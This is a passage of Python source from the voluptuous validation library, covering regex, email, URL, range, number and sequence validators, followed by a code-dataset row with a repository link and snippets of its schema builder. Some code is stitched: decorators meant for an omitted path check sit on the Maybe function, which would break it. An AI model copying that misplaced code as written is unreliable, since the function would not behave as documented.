    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...   validate('123EF4')

    Pattern may also be a _compiled regular expression:

    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """

    def __init__(self, pattern, msg=None):
        # Accept either a pattern string or a pre-compiled pattern object.
        if isinstance(pattern, basestring):
            pattern = re.compile(pattern)
        self.pattern = pattern
        self.msg = msg

    def __call__(self, v):
        try:
            matched = self.pattern.match(v)
        except TypeError:
            raise MatchInvalid("expected string or buffer")
        if matched:
            return v
        raise MatchInvalid(self.msg or 'does not match regular expression')

    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.

    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """

    def __init__(self, pattern, substitution, msg=None):
        # Compile on demand so callers may pass either a string pattern
        # or a pre-compiled one.
        if isinstance(pattern, basestring):
            pattern = re.compile(pattern)
        self.pattern = pattern
        self.substitution = substitution
        self.msg = msg

    def __call__(self, v):
        return self.pattern.sub(self.substitution, v)

    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (
            self.pattern.pattern, self.substitution, self.msg)
def _url_validation(v):
    # Shared helper for Url/FqdnUrl: parse *v* and require both a scheme
    # and a network location; returns the parse result on success.
    parsed = urlparse.urlparse(v)
    if not parsed.scheme or not parsed.netloc:
        raise UrlInvalid("must have a URL scheme and host")
    return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.
    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    # Raise ValueError for every invalid input; the @message decorator
    # reports it as EmailInvalid('expected an Email').  The previous bare
    # `except:` swallowed *every* exception (including the EmailInvalid it
    # had just raised), masking unexpected errors -- catch only the
    # exceptions that non-string input can actually produce.
    try:
        if not v or "@" not in v:
            raise ValueError
        user_part, domain_part = v.rsplit('@', 1)
    except (TypeError, AttributeError):
        # Non-string input (e.g. a truthy int has no rsplit / __contains__).
        raise ValueError
    if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
        raise ValueError
    return v
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.
    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...   s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    # ValueError is converted by @message into UrlInvalid.  The previous
    # bare `except:` masked unexpected errors; catch only what invalid
    # input can actually raise here.
    try:
        parsed_url = _url_validation(v)
    except (UrlInvalid, TypeError, AttributeError):
        # Missing scheme/host, or input urlparse cannot handle.
        raise ValueError
    if "." not in parsed_url.netloc:
        # Reject bare hostnames such as "localhost".
        raise ValueError
    return v
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.
    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...   s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    # ValueError is converted by @message into UrlInvalid.  The previous
    # bare `except:` masked unexpected errors; catch only what invalid
    # input can actually raise here.
    try:
        _url_validation(v)
    except (UrlInvalid, TypeError, AttributeError):
        raise ValueError
    return v
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.

    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...   IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...   IsFile()(None)
    """
    try:
        # Falsy values (None, '') cannot name a file; anything else is
        # stringified and checked on disk.
        if not v:
            raise FileInvalid('Not a file')
        return os.path.isfile(str(v))
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.

    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...   IsDir()(None)
    """
    try:
        # Falsy values cannot name a directory; anything else is
        # stringified and checked on disk.
        if not v:
            raise DirInvalid("Not a directory")
        return os.path.isdir(str(v))
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.
    :raises Invalid: if the value does not match the given validator and is not
    None
    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...   s("string")
    """
    # Simply delegates to Any: a literal None short-circuits validation.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.

    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.

    :raises Invalid: If the value is outside the range, or cannot be
        compared to the bounds at all.

    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...   s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...   s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...   Schema(Range(max=10, max_included=False))(20)
    """

    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included  # True: the bound itself is allowed
        self.max_included = max_included
        self.msg = msg

    def __call__(self, v):
        try:
            if self.min_included:
                if self.min is not None and not v >= self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % self.min)
            else:
                if self.min is not None and not v > self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be higher than %s' % self.min)
            if self.max_included:
                if self.max is not None and not v <= self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % self.max)
            else:
                if self.max is not None and not v < self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be lower than %s' % self.max)
            return v
        except TypeError:
            # Fix: values that cannot be compared to the bounds (e.g. None
            # vs. int on Python 3) previously escaped as a raw TypeError,
            # bypassing Invalid aggregation; report them as Invalid instead.
            raise RangeInvalid(
                self.msg or 'invalid value or type (must have a partial ordering)')

    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.

    Either bound may be omitted.

    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        # Pull the value up to the lower bound, then down to the upper.
        lo, hi = self.min, self.max
        if lo is not None and v < lo:
            v = lo
        if hi is not None and v > hi:
            v = hi
        return v

    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        # Measure once; check each configured bound.
        n = len(v)
        if self.min is not None and n < self.min:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        if self.max is not None and n > self.max:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v

    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""

    # ISO-8601-like timestamp with microseconds and a literal 'Z' suffix.
    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'

    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg

    def __call__(self, v):
        # Parse purely as a check; the original string is returned.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg or 'value does not match'
                            ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""

    # Overrides Datetime's timestamp format with a plain calendar date.
    DEFAULT_FORMAT = '%Y-%m-%d'

    def __call__(self, v):
        # Same parsing strategy as Datetime, but raises DateInvalid so
        # callers can distinguish date errors from datetime errors.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg or 'value does not match'
                            ' expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        # A TypeError from the membership test (e.g. unhashable v with a
        # set container) counts as "not a member".
        try:
            is_member = v in self.container
        except TypeError:
            is_member = False
        if not is_member:
            raise InInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        # A TypeError from the membership test is treated as disallowed.
        try:
            is_member = v in self.container
        except TypeError:
            is_member = True
        if is_member:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.

    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...   s([3, 2])
    """

    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg

    def __call__(self, v):
        # A TypeError from the membership test counts as "not contained".
        try:
            present = self.item in v
        except TypeError:
            present = False
        if not present:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
    constructors.
    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """

    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Pre-compile one Schema per positional validator.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        # The sequence type and length must match the validators exactly.
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            # Rebuild with the same sequence type (list stays list, tuple
            # stays tuple) from each positionally-validated element.
            v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        return v

    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.

    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__). JSON has no set type, so sets are
    represented as arrays; Unique verifies such an array has no dupes.

    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...   s([1, 1, 2])
    >>> s('abc')
    'abc'
    """

    def __init__(self, msg=None):
        self.msg = msg

    def __call__(self, v):
        try:
            unique_items = set(v)
        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        # No shrinkage means no duplicates.
        if len(unique_items) == len(v):
            return v
        # seen.add() returns None (falsy), so the generator keeps exactly
        # the items that were already seen -- the duplicates.
        seen = set()
        dupes = list(set(x for x in v if x in seen or seen.add(x)))
        raise Invalid(
            self.msg or 'contains duplicate items: {0}'.format(dupes))

    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.
    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...   s(2)
    Validators are not supported, match must be exact:
    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...   s('foo')
    """

    def __init__(self, target, msg=None):
        # target: the exact value the input must equal (compared with ==).
        self.target = target
        self.msg = msg

    def __call__(self, v):
        if v != self.target:
            raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
        return v

    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.
    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """

    def __init__(self, validators, msg=None, **kwargs):
        # Keep the raw validators for __repr__; pre-compile each one into
        # a Schema so the matching loop in __call__ stays cheap.
        self.validators = validators
        self.msg = msg
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        # Only list/tuple input is accepted, and it must match the
        # configured validators one-to-one.
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        consumed = set()  # indexes of schemas already matched to some element
        missing = []      # (index, value) pairs that matched no schema
        for index, value in enumerate(v):
            found = False
            # Greedy first-fit: each schema can be consumed by at most one
            # element, scanning elements in input order.
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v

    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """Verify a number's digit count (precision) and decimal places (scale).

    :raises Invalid: If the value does not match the provided Precision and Scale.

    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """

    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        self.precision = precision
        self.scale = scale
        self.msg = msg
        self.yield_decimal = yield_decimal

    def __call__(self, v):
        """Validate *v*, a number enclosed in a string; return it (or its Decimal)."""
        precision, scale, decimal_num = self._get_precision_scale(v)
        # If both constraints are configured and BOTH are violated, report
        # a single combined error; otherwise each check reports separately.
        both_set = self.precision is not None and self.scale is not None
        if both_set and precision != self.precision and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        if self.precision is not None and precision != self.precision:
            raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
        if self.scale is not None and scale != self.scale:
            raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
        return decimal_num if self.yield_decimal else v

    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))

    def _get_precision_scale(self, number):
        """Return ``(precision, scale, decimal_number)`` for *number*.

        precision is the count of significand digits; scale is the count
        of digits right of the decimal point (the negated exponent).
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        parts = decimal_num.as_tuple()
        return (len(parts.digits), -(parts.exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.
    The output of each validator is passed as input to the next.
    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met
    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...   validate(6.2)
    """

    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Unset bounds default to the loosest possible constraint.
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)

    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        # NOTE(review): v is threaded through every *successful* validator,
        # so later validators see earlier validators' output.
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))
        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)

    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Number._get_precision_scale | python | def _get_precision_scale(self, number):
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num) | :param number:
:return: tuple(precision, scale, decimal_number) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L935-L945 | null | class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
|
alecthomas/voluptuous | voluptuous/humanize.py | humanize_error | python | def humanize_error(data, validation_error, max_sub_error_length=MAX_VALIDATION_ERROR_ITEM_LENGTH):
if isinstance(validation_error, MultipleInvalid):
return '\n'.join(sorted(
humanize_error(data, sub_error, max_sub_error_length)
for sub_error in validation_error.errors
))
else:
offending_item_summary = repr(_nested_getitem(data, validation_error.path))
if len(offending_item_summary) > max_sub_error_length:
offending_item_summary = offending_item_summary[:max_sub_error_length - 3] + '...'
return '%s. Got %s' % (validation_error, offending_item_summary) | Provide a more helpful + complete validation error message than that provided automatically
Invalid and MultipleInvalid do not include the offending value in error messages,
and MultipleInvalid.__str__ only provides the first error. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/humanize.py#L19-L33 | [
"def _nested_getitem(data, path):\n for item_index in path:\n try:\n data = data[item_index]\n except (KeyError, IndexError, TypeError):\n # The index is not present in the dictionary, list or other\n # indexable or data is not subscriptable\n return None... | from voluptuous import Invalid, MultipleInvalid
from voluptuous.error import Error
MAX_VALIDATION_ERROR_ITEM_LENGTH = 500
def _nested_getitem(data, path):
for item_index in path:
try:
data = data[item_index]
except (KeyError, IndexError, TypeError):
# The index is not present in the dictionary, list or other
# indexable or data is not subscriptable
return None
return data
def validate_with_humanized_errors(data, schema, max_sub_error_length=MAX_VALIDATION_ERROR_ITEM_LENGTH):
try:
return schema(data)
except (Invalid, MultipleInvalid) as e:
raise Error(humanize_error(data, e, max_sub_error_length))
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _compile_scalar | python | def _compile_scalar(schema):
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value | A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a') | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L785-L831 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Singleton sentinel meaning "no value was supplied".

    Distinct from ``None`` so that ``None`` can still be used as a
    real default value. Compared by identity (``value is UNDEFINED``)
    and always falsy.
    """

    def __nonzero__(self):  # Python 2 truth-value hook
        return False

    # Bug fix: Python 3 ignores __nonzero__ and uses __bool__, so
    # bool(UNDEFINED) was True there despite this file supporting both
    # Python versions. Alias the method for consistent falsiness.
    __bool__ = __nonzero__

    def __repr__(self):
        return '...'


# Module-level singleton; all code tests identity against this object.
UNDEFINED = Undefined()
def Self():
    """Placeholder token for recursive schemas.

    ``Schema._compile`` intercepts this object and substitutes the
    enclosing schema's compiled validator, so an actual invocation
    means it leaked into a context where it is meaningless.
    """
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Normalize a default specification into a zero-argument factory.

    ``UNDEFINED`` and callables pass through untouched; any other
    value is wrapped in a lambda so it can be produced on demand.
    """
    passthrough = value is UNDEFINED or callable(value)
    return value if passthrough else (lambda: value)
@contextmanager
def raises(exc, msg=None, regex=None):
    """Context manager asserting that the managed block raises *exc*.

    If *msg* is given, the exception's string form must equal it
    exactly; if *regex* is given, it must match via ``re.search``.
    Note that the block completing without raising is not itself
    treated as a failure.
    """
    try:
        yield
    except exc as e:
        text = str(e)
        if msg is not None:
            assert text == msg, '%r != %r' % (text, msg)
        if regex is not None:
            assert re.search(regex, text), '%r does not match %r' % (text, regex)
def Extra(_):
    """Schema token allowing keys absent from the schema.

    Used only as a marker; ``Schema._compile`` special-cases it, so
    directly invoking it is always a programming error.
    """
    raise er.SchemaError('"Extra" should never be called')


# Deprecated lowercase spelling, kept as a plain alias. Because extra()
# is never actually invoked there is no way to emit a deprecation
# warning for references to it.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
